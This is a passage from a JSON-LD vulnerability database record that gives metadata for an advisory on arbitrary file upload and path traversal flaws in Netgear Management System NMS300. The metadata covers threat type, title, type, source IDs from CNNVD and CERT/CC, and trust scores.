      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "specific network environment",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Netgear Management System NMS300 contains arbitrary file upload and path traversal vulnerabilities",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#777024"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-129"
      }
    ],
    "trust": 0.6
  }
}

